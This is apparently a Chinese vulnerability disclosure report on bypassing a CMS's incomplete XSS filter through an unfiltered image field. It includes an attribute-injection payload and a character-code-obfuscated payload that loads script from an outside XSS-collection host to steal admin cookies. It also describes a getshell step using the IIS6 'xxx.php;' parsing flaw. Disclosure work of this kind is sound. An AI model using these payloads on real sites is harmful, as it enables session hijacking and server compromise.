### 简要描述:
没有过滤完全。。
### 详细说明:
官方修补的还不是很完美呢,
黑盒测试下,在上次添加文章处
提交 `<img src =x onerror=""> <script>`
后台查看源码 内容已经没有了
提交 `<img>`
后台查看源码 有 `<img>`
提交 onerror
后台 看下 出现了 onerror
那么,基本可以确定 是判断 <>内 是否存在 script onerror onclick。。。等关键字。
这样就很好办了, 找到一个位于html 标签属性内的可控点 就行了
当然 还要 ""闭合,然而在文章标题处输入 " 发现"被过滤成 \"了,
经过一轮 fuzzing,发现 在 添加专题处
[<img src="https://images.seebug.org/upload/201403/060335074a71fd689c8c9733f342b5c41f71749e.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060335074a71fd689c8c9733f342b5c41f71749e.jpg)
抓包 修改cs_pic 值为
```
" onfocusin=alert(0) autofocus x="
```
[<img src="https://images.seebug.org/upload/201403/060337527d626cfdb1abfab9a5d4b728a037dc8e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060337527d626cfdb1abfab9a5d4b728a037dc8e.jpg)
成功alert
[<img src="https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg)
当然 仅仅是alert还是不够的,远程加载js才是王道。。。。
应为对 单引号的过滤 所以可以类似于这样
```
onfocusin=write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,47,47,120,115,115,46,119,101,98,118,117,108,46,99,111,109,47,53,78,86,104,110,83,34,62,60,47,115,99,114,105,112,116,62)) autofocus x="
```
收到cookie,打到后台
[<img src="https://images.seebug.org/upload/201403/06034356ec0ed0d8fb84fe256843b931b4978eaf.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/06034356ec0ed0d8fb84fe256843b931b4978eaf.jpg)
getshell的话,iis6下解析漏洞 模板名改为 xxx.php;即可
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/060343299e766d65c4c9fd3d995680b040f58d40.jpg)
暂无评论